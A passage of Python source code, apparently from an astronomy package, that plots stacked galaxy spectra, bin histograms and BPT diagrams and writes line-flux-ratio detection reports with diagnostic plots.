Bound', showlegend=False, hovertemplate='%{y}'))\n fig.add_trace(plotly.graph_objects.Scatter(x=wave[good], y=(flux - err)[good],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n fill='tonexty', name='Lower Bound', showlegend=False,\n hovertemplate='%{y}'))\n\n emlines = np.array(\n [1033.820, 1215.240, 1240.810, 1305.530, 1335.310, 1397.610, 1399.800, 1549.480, 1640.400,\n 1665.850, 1857.400, 1908.734, 2326.000, 2439.500, 2799.117, 3727.092,\n 3729.875, 4102.890, 4341.680, 4364.436, 4862.680, 4960.295, 5008.240, 6300.304, 6363.776,\n 6549.860, 6564.610, 6585.270, 6718.290, 6732.670])\n clines = np.array(\n [3346.790, 3426.850, 3759, 3839, 3891, 3970, 4181, 4893, 5146, 5159, 5176, 5276, 5303, 5309, 5335,\n 5533, 5720, 6087, 6374.510, 7891.800])\n cline_names = np.array(\n ['[Ne V]', '[Ne V]*', '[Fe VII]', '[Fe V]', '[Fe V]', '[Ne III]', '[Fe V]', '[Fe VII]', '[Fe VI]',\n '[Fe VII]', '[Fe VI]', '[Fe VII]', '[Fe XIV]', '[Ca V]', '[Fe VI]', '[Ar X]', '[Fe VII]',\n '[Fe VII]*',\n '[Fe X]', '[Fe XI]'], dtype=str\n )\n abslines = np.array([3934.777, 3969.588, 5176.700, 5895.600, 8500.3600, 8544.440, 8664.520])\n for line in emlines:\n fig.add_vline(x=line, line_width=linewidth, line_dash='dash', line_color='#663399')\n for line, name in zip(clines, cline_names):\n if cline_labels == 'all' or (type(cline_labels) is list and name in cline_labels):\n fig.add_vline(x=line, line_width=2 * linewidth, line_dash='dot', line_color='#226666',\n annotation_text=name, annotation_position='top right', annotation_font_size=12)\n for line in abslines:\n fig.add_vline(x=line, line_width=linewidth, line_dash='dash', line_color='#d1c779')\n title = 'Stacked Spectra'\n fig.update_layout(\n yaxis_title='$f_{\\\\lambda}\\\\ ({\\\\rm normalized})$',\n xaxis_title='$\\\\lambda_{\\\\rm rest}\\\\ (Å)$',\n title=title,\n hovermode='x unified',\n template='plotly_white'\n )\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n fig.update_xaxes(\n range=(np.nanmin(wave), np.nanmax(wave)),\n constrain='domain'\n )\n fig.update_yaxes(\n range=(0, np.nanmax(flux) + err[np.nanargmax(flux)] + .3),\n constrain='domain'\n )\n fig.write_html(fname, include_mathjax=\"cdn\")\n # fig.write_image(fname.replace('.html', '.pdf'), width=1280, height=540)\n\n def plot_spectra(self, fname_root, spectra='all', _range=None, ylim=None, title_text=None, backend='plotly',\n plot_model=None, f=None, shade_reg=None, normalized=False):\n \"\"\"\n Spectra.plot_spectra but incorporates the information from self.normalized.\n\n \"\"\"\n print('Plotting spectra...')\n fmt = '.html' if backend == 'plotly' else '.pdf'\n if not os.path.exists(fname_root):\n os.makedirs(fname_root)\n if type(spectra) is str:\n if spectra == 'all':\n for i, item in enumerate(tqdm.tqdm(self)):\n ttl = None if title_text is None else title_text[item]\n if _range:\n good = np.where((self[item].wave > _range[0]) & (self[item].wave < _range[1]))[0]\n if good.size < 10:\n continue\n if f is not None:\n fname = os.path.join(fname_root, self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n else:\n fname = os.path.join(fname_root, self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n self[item].plot(fname=fname,\n backend=backend, _range=_range, ylim=ylim, title_text=ttl, plot_model=plot_model,\n shade_reg=shade_reg, normalized=normalized)\n else:\n for i, item in enumerate(tqdm.tqdm(self)):\n if item in spectra:\n if item not in self or item not in title_text:\n print(f'WARNING: {item} not found in stack!')\n continue\n if _range:\n good = np.where((self[item].wave > _range[0]) & (self[item].wave < _range[1]))[0]\n if good.size < 10:\n continue\n ttl = None if title_text is None else title_text[item]\n if f is not None:\n fname = os.path.join(fname_root,\n f'{f[i]:.3f}_' + self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n else:\n fname = os.path.join(fname_root, self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n self[item].plot(fname=fname,\n backend=backend, _range=_range, ylim=ylim, title_text=ttl, plot_model=plot_model,\n shade_reg=shade_reg, normalized=normalized)\n print('Done.')\n\n def plot_hist(self, fname_base, plot_log=False, backend='plotly'):\n \"\"\"\n Plot a histogram of the spectra in each bin.\n\n :param fname_base: str\n File name pattern.\n :param plot_log: boolean\n If True, makes the y-axis logarithmic.\n :param backend: str\n Whether to use matplotlib or plotly to plot stuff\n :return None:\n \"\"\"\n fmt = '.html' if backend == 'plotly' else '.pdf'\n fname = fname_base + fmt\n widths = np.diff(self.bin_edges)\n midpts = (self.bin_edges[:-1] + self.bin_edges[1:]) / 2\n nbins = len(widths)\n if backend == 'pyplot':\n fig, ax = plt.subplots()\n ax.bar(midpts, self.bin_counts, widths, align='center', color='rebeccapurple',\n label='$n_{\\\\rm bins} = %d$' % nbins,\n log=plot_log)\n xlabel = '$\\\\log_{10}($' + self.binned + '$)$' if self.bin_log else self.binned\n ax.set_xlabel(xlabel)\n ax.set_ylabel('Number in bin')\n ax.legend()\n ax.set_xticks(self.bin_edges)\n fig.savefig(fname, dpi=300, bbox_inches='tight')\n elif backend == 'plotly':\n fig = plotly.graph_objects.Figure(data=plotly.graph_objects.Bar(x=midpts, y=self.bin_counts))\n fig.update_traces(marker_color='rgb(158,202,225)', marker_line_color='rgb(8,48,107)',\n marker_line_width=0.0, opacity=0.8)\n xlabel = '$\\\\log(' + self.binned + ')$' if self.bin_log else self.binned\n fig.update_layout(\n xaxis_title=xlabel,\n yaxis_title='Number in bin',\n hovermode='x',\n xaxis=dict(\n tickmode='array',\n tickvals=self.bin_edges\n ),\n template='plotly_white'\n )\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n if plot_log:\n fig.update_yaxes(\n type=\"log\",\n )\n fig.write_html(fname, include_mathjax=\"cdn\")\n # fig.write_image(fname.replace('.html', '.pdf'))\n\n def plot_agn(self, fname_base, bpt_x, bpt_y, bpt_xerr=None, bpt_yerr=None, labels=None, backend='plotly'):\n \"\"\"\n Plot galaxies in the stack on a BPT-diagram, assuming galaxies have the appropriate BPT data to do so.\n\n :param fname_base: str\n Filename exlcuding the extension.\n :param bpt_x: str\n The name of the BPT ratio for the x-axis.\n :param bpt_y: str\n The name of the BPT ratio for the y-axis.\n :param bpt_xerr: optional, str\n The name of the error in the x-axis BPT ratio. If not specified, no errorbars will be plotted.\n :param bpt_yerr: optional, str\n The name of the error in the y-axis BPT ratio. If not specified, no errorbars will be plotted.\n :param labels: iterable\n List of strings specifying the names of the x and y axes.\n :param backend: str\n 'plotly' or 'pyplot'\n :return:\n \"\"\"\n fmt = '.html' if backend == 'plotly' else '.pdf'\n fname = fname_base + fmt\n data = np.array(\n [(self[i].data[bpt_x], self[i].data[bpt_y], self[i].data['agn_frac']) for i in range(len(self))])\n x = data[:, 0]\n y = data[:, 1]\n z = data[:, 2]\n xerr = yerr = None\n if bpt_xerr:\n xerr = np.array([self[i].data[bpt_xerr] for i in range(len(self))])\n if bpt_yerr:\n yerr = np.array([self[i].data[bpt_yerr] for i in range(len(self))])\n if labels:\n xl, yl = labels\n else:\n xl, yl = bpt_x, bpt_y\n k01_x = np.linspace(np.nanmin(x), np.min([np.nanmax(x), 0.469]), 100)\n k01_y = 0.61 / (k01_x - 0.47) + 1.19\n if backend == 'pyplot':\n fig, ax = plt.subplots()\n ax.set_xlabel(xl)\n ax.set_ylabel(yl)\n scp = ax.errorbar(x, y, xerr=xerr, yerr=yerr, fmt='.', c=z, cmap='coolwarm')\n fig.colorbar(scp, ax=ax, label='AGN Fraction')\n ax.plot(k01_x, k01_y, 'k--', lw=.5, label='Kewley et al. 2001 Cutoff')\n ax.legend()\n fig.savefig(fname, dpi=300, bbox_inches='tight')\n elif backend == 'plotly':\n fig = plotly.graph_objects.Figure(\n data=plotly.graph_objects.Scatter(\n x=x, y=y, mode='markers',\n error_x=dict(type='data', array=xerr, visible=True),\n error_y=dict(type='data', array=yerr, visible=True),\n marker=dict(size=4, color=z, colorscale='bluered', showscale=True),\n showlegend=False, hovertemplate='(x: %{x:.5f}, y: %{y:.5f}),
    AGN_frac = %{marker.color:.5f}'\n )\n )\n fig.add_trace(\n plotly.graph_objects.Scatter(x=k01_x, y=k01_y, line=dict(color='black', width=.5, dash='dash'),\n name='Kewley et al. 2001 Cutoff', showlegend=False))\n fig.update_layout(\n xaxis_title=xl,\n yaxis_title=yl,\n title='Reference point: ({:.5f},{:.5f})'.format(*self.agn_ref_pt),\n template='plotly_white'\n )\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n fig.update_yaxes(\n range=(np.nanmin(y) - 0.05, np.nanmax(y) + 0.05),\n constrain='domain'\n )\n fig.update_xaxes(\n range=(np.nanmin(x) - 0.05, np.nanmax(x) + 0.05),\n constrain='domain'\n )\n fig.write_html(fname, include_mathjax=\"cdn\")\n # fig.write_image(fname.replace('.html', '.pdf'))\n\n def line_flux_report(self, fluxr_dict, line=6374, dw=10, norm_dw=(30, 30), plot_range=None, ratio_target=3,\n plot_backend='plotly', path='',\n agn_diagnostics=False, ylim=None, title_text_conf=None, title_text_snr=None, tag='',\n conf_dict=None, conf_target=None, inspect=None, plot_spec='none'):\n \"\"\"\n Plotting diagnostics for line flux ratio tests.\n\n :param fluxr_dict: dict\n Dictionary of results from a line flux test, as formatted by the calc_line_flux_ratios method.\n :param line: int, float\n The wavelength of the line that was integrated in fluxr_dict.\n :param dw: int, float\n Range of wavelengths to the left/right of line that was used in the integration of fluxr_dict.\n :param norm_dw: tuple\n Tuple with values for the number of angstroms to the left/right that the center of the comparison regions\n are from the center of the central region. For plotting purposes.\n :param plot_range: tuple\n wavelength limits on the plotted data\n :param ratio_target: int, float\n A cutoff of the integrated line flux above which to consider a galaxies a 'detection'\n :param plot_backend: str\n 'pyplot' or 'plotly'\n :param path: str\n Output path for plots.\n :param agn_diagnostics: boolean\n If True, calculate the Kewley et al. 2001 criteria for spectra and print comparisons to those detected by\n the line flux tests. Requires spectra to have BPT data ALREADY CALCULATED.\n :param ylim: optional, tuple\n Plot y-limits to be passed to the plot_spectra method.\n :param tag: optional, str\n A tag to append to the end of saved files.\n :param title_text_conf: optional, str\n Name of the a priori confidence value of a spectrum. Must be in the Spectrum's data dictionary.\n :param title_text_snr: optional, str\n Name of the SNR value of a spectrum. Must be in the Spectrum's data dictionary.\n :param conf_dict: optional, dict\n A priori confidence levels for each spectra, as formatted by the calc_line_flux_ratios method.\n :param conf_target: optional, float\n Required if conf_dict is provided and plot_spec is 'sorted'. The target confidence level above which\n something is considered a true positive.\n :param inspect: str\n Key for a value in the data dictionary that has an additional property to be plotted on the color axis of\n the confidence covariance plots.\n :param plot_spec: str\n 'none', 'all', 'detections', or 'sorted' to plot none, all, only those individual spectra that satisfy the\n detection criterium, or all in sorted sub-folders\n :return ss: list of np.ndarray\n The names of all the spectra that passed the detection criterium for each bin.\n \"\"\"\n self._line_flux_diagnostics(fluxr_dict, line, dw, plot_backend=plot_backend, title_text_snr=title_text_snr,\n conf_dict=conf_dict,\n inspect=inspect, path=path)\n ss = []\n\n ratios = np.array([fluxr_dict[key] for key in fluxr_dict])\n specnames = np.array([key for key in fluxr_dict], dtype=object)\n\n good = [np.where((self[s].wave > line - dw) & (self[s].wave < line + dw))[0] for s in specnames]\n amps = np.zeros(specnames.size)\n amps_dict = {}\n for j, s in enumerate(specnames):\n if good[j].size > 1:\n f = np.nanmax(self[s].flux[good[j]]) - 1\n amps[j] = f\n amps_dict[s] = f\n else:\n amps_dict[s] = 0.\n\n if title_text_conf:\n confidences = np.array([self[sn].data[title_text_conf] for sn in specnames])\n # ind = ratios.argsort()[-5:][::-1]\n w = np.where(ratios >= ratio_target)[0]\n print(len(w), f' galaxies fulfill the threshold of {ratio_target}:')\n print(specnames[w])\n if agn_diagnostics:\n kew = np.array([self[i].data['agn_class'] for i in specnames])\n kw = np.where((kew is False) & (ratios >= ratio_target))[0]\n print(f'Of these, {len(kw)} did NOT satisfy the Kewley et al. 2001 criteria: ')\n print(specnames[kw])\n ss.append(specnames[w])\n if title_text_snr:\n snrs = np.array([self[si].data[title_text_snr] for si in specnames])\n tt = {s: r'$\\mathcal{F}=%.3f$' % r for s, r in zip(specnames, ratios)} if not title_text_conf else \\\n {s: r'$\\mathcal{F}=%.3f$; $conf=%.3f$' % (r, c) for s, r, c in\n zip(specnames, ratios, confidences)} if not title_text_snr else \\\n {s: r'$\\mathcal{F}=%.3f$; $conf=%.3f$; $SNR=%.3f$, $A*SNR=%.3f$' % (r, c, snr, a * snr) for\n s, r, c, snr, a in zip(specnames, ratios, confidences, snrs, amps)}\n if title_text_conf:\n tp = np.where((ratios >= ratio_target) & (confidences >= conf_target))[0]\n fp = np.where((ratios >= ratio_target) & (confidences < conf_target))[0]\n tn = np.where((ratios < ratio_target) & (confidences < conf_target))[0]\n fn = np.where((ratios < ratio_target) & (confidences >= conf_target))[0]\n ntp = len(tp)\n nfp = len(fp)\n ntn = len(tn)\n nfn = len(fn)\n tpsnr = np.nanmedian([self[ispec].data[title_text_snr] for ispec in specnames[tp]])\n fpsnr = np.nanmedian([self[ispec].data[title_text_snr] for ispec in specnames[fp]])\n tnsnr = np.nanmedian([self[ispec].data[title_text_snr] for ispec in specnames[tn]])\n fnsnr = np.nanmedian([self[ispec].data[title_text_snr] for ispec in specnames[fn]])\n tpasnr = np.nanmedian([self[ispec].data[title_text_snr] * amps_dict[ispec] for ispec in specnames[tp]])\n fpasnr = np.nanmedian([self[ispec].data[title_text_snr] * amps_dict[ispec] for ispec in specnames[fp]])\n tnasnr = np.nanmedian([self[ispec].data[title_text_snr] * amps_dict[ispec] for ispec in specnames[tn]])\n fnasnr = np.nanmedian([self[ispec].data[title_text_snr] * amps_dict[ispec] for ispec in specnames[fn]])\n with open(os.path.join(path, 'report_' + str(line) + '_' + tag + '.txt'), 'w') as file:\n file.write('tp: ' + str(ntp) + ', med SNR: ' + str(tpsnr) + ', med A*SNR: ' + str(tpasnr) + '\\n')\n file.write('fp: ' + str(nfp) + ', med SNR: ' + str(fpsnr) + ', med A*SNR: ' + str(fpasnr) + '\\n')\n file.write('tn: ' + str(ntn) + ', med SNR: ' + str(tnsnr) + ', med A*SNR: ' + str(tnasnr) + '\\n')\n file.write('fn: ' + str(nfn) + ', med SNR: ' + str(fnsnr) + ', med A*SNR: ' + str(fnasnr) + '\\n')\n else:\n with open(os.path.join(path, 'report_' + str(line) + '_' + tag + '.txt'), 'w') as file:\n file.write('number integrated: ' + str(len(specnames)) + '\\n')\n file.write('detections: ' + str(len(specnames[w])) + '\\n')\n file.write('non-detections: ' + str(len(specnames) - len(specnames[w])) + '\\n')\n if plot_spec != 'none':\n if plot_spec == 'sorted':\n if conf_dict is not None:\n tp = np.where((ratios >= ratio_target) & (confidences >= conf_target))[0]\n fp = np.where((ratios >= ratio_target) & (confidences < conf_target))[0]\n tn = np.where((ratios < ratio_target) & (confidences < conf_target))[0]\n fn = np.where((ratios < ratio_target) & (confidences >= conf_target))[0]\n name_list = [specnames[tp], specnames[fp], specnames[tn], specnames[fn]]\n ratio_list = [ratios[tp], ratios[fp], ratios[tn], ratios[fn]]\n path_list = ['true_positives_' + str(line), 'false_positives+' + str(line),\n 'true_negatives_' + str(line), 'false_negatives_' + str(line)]\n else:\n nw = np.where(ratios < ratio_target)[0]\n name_list = [specnames[w], specnames[nw]]\n ratio_list = [ratios[w], ratios[nw]]\n path_list = ['detections', 'non-detections']\n elif plot_spec == 'all':\n name_list = [specnames]\n ratio_list = [ratios]\n path_list = ['spectra_' + str(line)]\n elif plot_spec == 'detections':\n name_list = [specnames[w]]\n ratio_list = [ratios[w]]\n path_list = ['detections_' + str(line)]\n else:\n raise ValueError('invalid plot_spec option')\n for names, rts, pathi in zip(name_list, ratio_list, path_list):\n shade = [(line - dw, line + dw), (line - norm_dw[0] - dw, line - norm_dw[0] + dw),\n (line + norm_dw[1] - dw, line + norm_dw[1] + dw)]\n self.plot_spectra(os.path.join(path, pathi), names, _range=plot_range, ylim=ylim,\n backend=plot_backend,\n title_text=tt, f=None, shade_reg=shade)\n return ss\n\n def _line_flux_diagnostics(self, fluxr_dict, line=6374, dw=5, title_text_snr=None, plot_backend='pyplot',\n conf_dict=None,\n inspect=None, path=''):\n # 10^-17 erg s^-1 cm^-2 (not per angstrom after integration)\n # Get data\n ratios = np.array(list(fluxr_dict.values()))\n specnames = np.array(list(fluxr_dict.keys()))\n good = [np.where((self[s].wave > line - dw) & (self[s].wave < line + dw))[0] for s in specnames]\n amps = np.zeros(specnames.size)\n for j, s in enumerate(specnames):\n if good[j].size > 1:\n amps[j] = np.nanmax(self[s].flux[good[j]]) - 1\n inspections = None\n if inspect:\n inspections = np.array([self[si].data[inspect] for si in specnames])\n snrs = None\n if title_text_snr:\n snrs = np.array([self[si].data[title_text_snr] for si in specnames])\n # stack_fluxes.append(fluxr_dict[i]['stack'][0])\n\n # Get mins/maxes\n # lstr = len(list(fluxr_dict[0].keys())[0])\n\n # for j in range(len(fluxr_dict)):\n minrind = np.nanargmin(ratios)\n min2rind = np.nanargmin(np.delete(ratios, minrind))\n maxrind = np.nanargmax(ratios)\n max2rind = np.nanargmax(np.delete(ratios, maxrind))\n maxr = (ratios[maxrind], np.delete(ratios, maxrind)[max2rind])\n minr = (ratios[minrind], np.delete(ratios, minrind)[min2rind])\n maxs = (specnames[maxrind], np.delete(specnames, maxrind)[max2rind])\n mins = (specnames[minrind], np.delete(specnames, minrind)[min2rind])\n\n reg = (line - dw * 2, line + dw * 2)\n if plot_backend == 'pyplot':\n # Set up a gridspec\n fig = plt.figure(constrained_layout=True)\n gs = fig.add_gridspec(3, 3)\n # Main flux ratio plot\n ratioplot = fig.add_subplot(gs[0:2, 0:2])\n ratioplot.hist(ratios, bins=np.arange(0, 3.2, 0.2), density=False)\n ratioplot.set_yscale('log')\n ratioplot.set_xlabel('Line flux / Stacked line flux')\n ratioplot.set_ylabel('Number in bin')\n # ratioplot.set_title('Stacked line flux $= %.3f' % stack_fluxes[k])\n # ratioplot.set_ylim(0, 3)\n\n small = []\n big = []\n for m in range(2):\n # 2 smallest line ratios' profiles\n good1 = np.where((reg[0] < self[mins[m]].wave) & (self[mins[m]].wave < reg[1]))[0]\n small1 = fig.add_subplot(gs[2, m])\n small1.plot(self[mins[m]].wave[good1], self[mins[m]].flux[good1], 'k-')\n small1.fill_between(self[mins[m]].wave[good1],\n self[mins[m]].flux[good1] - self[mins[m]].error[good1],\n self[mins[m]].flux[good1] + self[mins[m]].error[good1],\n color='mediumaquamarine', alpha=0.5)\n small1.axvline(line, linestyle='--', color='k')\n small1.axvspan(line - dw, line + dw, color='slategrey', alpha=0.5)\n ttl = mins[m] if len(mins[m]) <= 10 else mins[m][0:10] + '...'\n small1.set_title(ttl)\n small1.set_xticks([line - dw, line + dw])\n if m == 0:\n small1.set_ylabel('Norm. Flux')\n elif m == 1:\n small1.set_xlabel('Wavelength [${\\\\rm \\\\AA}$]')\n small.append(small1)\n # 2 largest line ratios' profiles\n good2 = np.where((reg[0] < self[maxs[m]].wave) & (self[maxs[m]].wave < reg[1]))[0]\n big1 = fig.add_subplot(gs[m, 2])\n big1.plot(self[maxs[m]].wave[good2], self[maxs[m]].flux[good2], 'k-')\n big1.fill_between(self[maxs[m]].wave[good2],\n self[maxs[m]].flux[good2] - self[maxs[m]].error[good2],\n self[maxs[m]].flux[good2] + self[maxs[m]].error[good2],\n color='mediumaquamarine', alpha=0.5)\n big1.axvline(line, linestyle='--', color='k')\n big1.axvspan(line - dw, line + dw, color='slategrey', alpha=0.5)\n ttl = maxs[m] if len(maxs[m]) <= 10 else maxs[m][0:10] + '...'\n big1.set_title(ttl)\n big1.set_xticks([line - dw, line + dw])\n big.append(big1)\n\n # Stack line profile\n # stack = fig.add_subplot(gs[2, 2])\n # good = np.where((reg[0] < self.universal_grid[k]) & (self.universal_grid[k] < reg[1]))[0]\n # stack.plot(self.universal_grid[k][good], self.stacked_flux[k][good], 'k-')\n # stack.fill_between(self.universal_grid[k][good],\n # self.stacked_flux[k][good]-self.stacked_err[k][good],\n # self.stacked_flux[k][good]+self.stacked_err[k][good],\n # color='mediumaquamarine', alpha=0.5)\n # stack.axvline(line, linestyle='--', color='k')\n # stack.axvspan(line-dw, line+dw, color='slategrey', alpha=0.5)\n # stack.set_xticks([line-dw, line+dw])\n\n # Axis sharing\n big[0].sharex(big[1])\n # stack.sharex(big[0])\n small[0].sharex(big[0])\n small[1].sharex(small[0])\n big[0].sharey(big[1])\n # stack.sharey(big[0])\n small[0].sharey(big[0])\n small[1].sharey(small[0])\n\n # stack.set_title('Stack')\n fig.savefig(path + os.sep + 'line_flux_ratios.pdf', dpi=300)\n plt.close()\n\n if conf_dict:\n\n confidences = np.array([conf_dict[fi] for fi in conf_dict if fi != 'stack'])\n\n # Sort\n isort = np.argsort(confidences)\n confidences = confidences[isort]\n ratios = ratios[isort]\n amps = amps[isort]\n snrs = snrs[isort]\n asnr = amps * snrs\n if inspect:\n inspections = inspections[isort]\n\n std = np.nanstd(ratios)\n median = np.nanmedian(ratios)\n good = np.where((np.abs(ratios - median) < 3 * std) & (\n np.isfinite(confidences) & np.isfinite(ratios)))[0]\n ratios = ratios[good]\n confidences = confidences[good]\n asnr = asnr[good]\n\n # ntop = int(.2*len(ratios[k]))\n # rsort = np.argsort(ratios[k])\n # top20 = ratios[k][rsort][len(ratios[k])-ntop:]\n # top20c = confidences[k][rsort][len(ratios[k])-ntop:]\n\n A = np.vstack((confidences, np.ones_like(confidences))).T\n m, c = np.linalg.lstsq(A, ratios, rcond=None)[0]\n x_model = np.linspace(confidences[0], confidences[-1], 1000)\n y_model = m * x_model + c\n\n fig, ax = plt.subplots()\n dataplot = ax.plot(confidences, ratios, '.', color=asnr if not inspect else inspections,\n cmap='winter')\n fig.colorbar(dataplot, ax=ax, label='$A*SNR$' if not inspect else 'Inspections')\n # ax.plot(top20c, top20, '.', color='cyan', label='Top 20%')\n ax.plot(x_model, y_model, 'k--')\n ax.legend()\n ax.set_title(r'Linear Least Squares Fit: $m=%.3f$, $b=%.3f$' % (m, c))\n ax.set_xlabel('Confidence Level')\n ax.set_ylabel(r'Line Flux Ratio Parameter $\\mathcal{F}$')\n # ax.set_ylim(-10, 10)\n fig.savefig(path + os.sep + 'line_flux_confidence_covar.pdf', dpi=300)\n plt.close()\n\n elif plot_backend == 'plotly':\n\n ttl1 = maxs[0] if len(maxs[0]) <= 10 else maxs[0][0:10] + '...'\n ttl2 = maxs[1] if len(maxs[1]) <= 10 else maxs[1][0:10] + '...'\n ttl3 = mins[0] if len(mins[0]) <= 10 else mins[0][0:10] + '...'\n ttl4 = mins[1] if len(mins[1]) <= 10 else mins[1][0:10] + '...'\n fig = plotly.subplots.make_subplots(rows=3, cols=3,\n specs=[[{\"rowspan\": 2, \"colspan\": 2}, None, {}],\n [None, None, {}],\n [{}, {}, {}]],\n subplot_titles=['',\n ttl1, ttl2, ttl3, ttl4, 'Stack'])\n fig.add_trace(plotly.graph_objects.Histogram(x=ratios, xbins=dict(start=0, end=max(ratios),\n size=max(ratios)/10)), row=1,\n col=1)\n fig.update_traces(marker_color='rgb(158,202,225)', marker_line_color='rgb(8,48,107)',\n marker_line_width=0.0, opacity=0.8, row=1, col=1)\n fig.update_layout(\n yaxis=dict(type='log'),\n yaxis_title_text='Number in bin',\n xaxis_title_text='Line flux / stacked line flux',\n template='plotly_white'\n # title_text='Stacked line flux $= %.3f \\\\times 10^{-17}$ erg s$^{-1}$ cm$^{-2}$' % stack_fluxes[k],\n )\n linewidth = .5\n maxy = -9999\n miny = 9999\n for m in range(2):\n good1 = np.where((reg[0] < self[mins[m]].wave) & (self[mins[m]].wave < reg[1]) &\n np.isfinite(self[mins[m]].flux) & np.isfinite(self[mins[m]].error))[0]\n fig.add_trace(\n plotly.graph_objects.Scatter(x=self[mins[m]].wave[good1], y=self[mins[m]].flux[good1],\n line=dict(color='black', width=linewidth),\n name='Data', showlegend=False), row=3, col=m + 1)\n fig.add_trace(plotly.graph_objects.Scatter(x=self[mins[m]].wave[good1],\n y=self[mins[m]].flux[good1] + self[mins[m]].error[\n good1],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n name='Upper Bound', showlegend=False), row=3, col=m + 1)\n fig.add_trace(plotly.graph_objects.Scatter(x=self[mins[m]].wave[good1],\n y=self[mins[m]].flux[good1] - self[mins[m]].error[\n good1],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n fill='tonexty', name='Lower Bound', showlegend=False),\n row=3, col=m + 1)\n fig.add_vline(x=line, line_width=2 * linewidth, line_dash='dot', line_color='#226666', row=3,\n col=m + 1)\n n = m + 4\n fig['layout']['xaxis' + str(n)]['tickmode'] = 'array'\n fig['layout']['xaxis' + str(n)]['tickvals'] = [line - dw, line + dw]\n # fig['layout']['title'+str(n)]['text'] = mins[m, k]\n if m == 0:\n fig['layout']['yaxis' + str(n)]['title_text'] = 'Norm. Flux'\n elif m == 1:\n fig['layout']['xaxis' + str(n)]['title_text'] = 'Wavelength [Å]'\n maxiy = np.nanmax(self[mins[m]].flux[good1]) + .5\n miniy = np.nanmin(self[mins[m]].flux[good1]) - .5\n if maxiy > maxy:\n maxy = maxiy\n if miniy < miny:\n miny = miniy\n good2 = np.where((reg[0] < self[maxs[m]].wave) & (self[maxs[m]].wave < reg[1]))[0]\n fig.add_trace(\n plotly.graph_objects.Scatter(x=self[maxs[m]].wave[good2], y=self[maxs[m]].flux[good2],\n line=dict(color='black', width=linewidth),\n name='Data', showlegend=False), row=m + 1, col=3)\n fig.add_trace(plotly.graph_objects.Scatter(x=self[maxs[m]].wave[good2],\n y=self[maxs[m]].flux[good2] + self[maxs[m]].error[\n good2],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n name='Upper Bound', showlegend=False), row=m + 1, col=3)\n fig.add_trace(plotly.graph_objects.Scatter(x=self[maxs[m]].wave[good2],\n y=self[maxs[m]].flux[good2] - self[maxs[m]].error[\n good2],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)',\n fill='tonexty', name='Lower Bound', showlegend=False),\n row=m + 1, col=3)\n fig.add_vline(x=line, line_width=2 * linewidth, line_dash='dot', line_color='#226666', row=m + 1,\n col=3)\n n2 = m + 2\n fig['layout']['xaxis' + str(n2)]['tickmode'] = 'array'\n fig['layout']['xaxis' + str(n2)]['tickvals'] = [line - dw, line + dw]\n # fig['layout']['title'+str(n2)]['text'] = maxs[m, k]\n maxiy = np.nanmax(self[maxs[m]].flux[good2]) + .5\n miniy = np.nanmin(self[maxs[m]].flux[good2]) - .5\n if maxiy > maxy:\n maxy = maxiy\n if miniy < miny:\n miny = miniy\n\n # good = np.where((reg[0] < self.universal_grid[k]) & (self.universal_grid[k] < reg[1]))[0]\n # fig.add_trace(plotly.graph_objects.Scatter(x=self.universal_grid[k][good], y=self.stacked_flux[k][good],\n # line=dict(color='black', width=linewidth),\n # name='Data', showlegend=False), row=3, col=3)\n # fig.add_trace(plotly.graph_objects.Scatter(x=self.universal_grid[k][good],\n # y=self.stacked_flux[k][good] + self.stacked_err[k][good],\n # line=dict(color='#60dbbd', width=0),\n # fillcolor='rgba(96, 219, 189, 0.6)',\n # name='Upper Bound', showlegend=False), row=3, col=3)\n # fig.add_trace(plotly.graph_objects.Scatter(x=self.universal_grid[k][good],\n # y=self.stacked_flux[k][good] - self.stacked_err[k][good],\n # line=dict(color='#60dbbd', width=0),\n # fillcolor='rgba(96, 219, 189, 0.6)',\n # fill='tonexty', name='Lower Bound', showlegend=False), row=3, col=3)\n # fig.add_vline(x=line, line_width=2 * linewidth, line_dash='dot', line_color='#226666', row=3, col=3)\n # fig['layout']['text'+str(6)] = 'Stack'\n fig['layout']['xaxis' + str(6)]['tickmode'] = 'array'\n fig['layout']['xaxis' + str(6)]['tickvals'] = [line - dw, line + dw]\n for i in range(2, 6):\n fig['layout']['yaxis' + str(i)]['range'] = (miny, maxy)\n fig['layout']['yaxis' + str(i)]['constrain'] = 'domain'\n fig['layout']['xaxis' + str(i)]['range'] = (line - 2 * dw, line + 2 * dw)\n fig['layout']['xaxis' + str(i)]['constrain'] = 'domain'\n fig.add_shape(type='rect', xref='x' + str(i), yref='y' + str(i), x0=line - dw, y0=miny,\n x1=line + dw, y1=maxy, fillcolor='lightgrey', opacity=0.5,\n line_width=0, layer='below')\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n 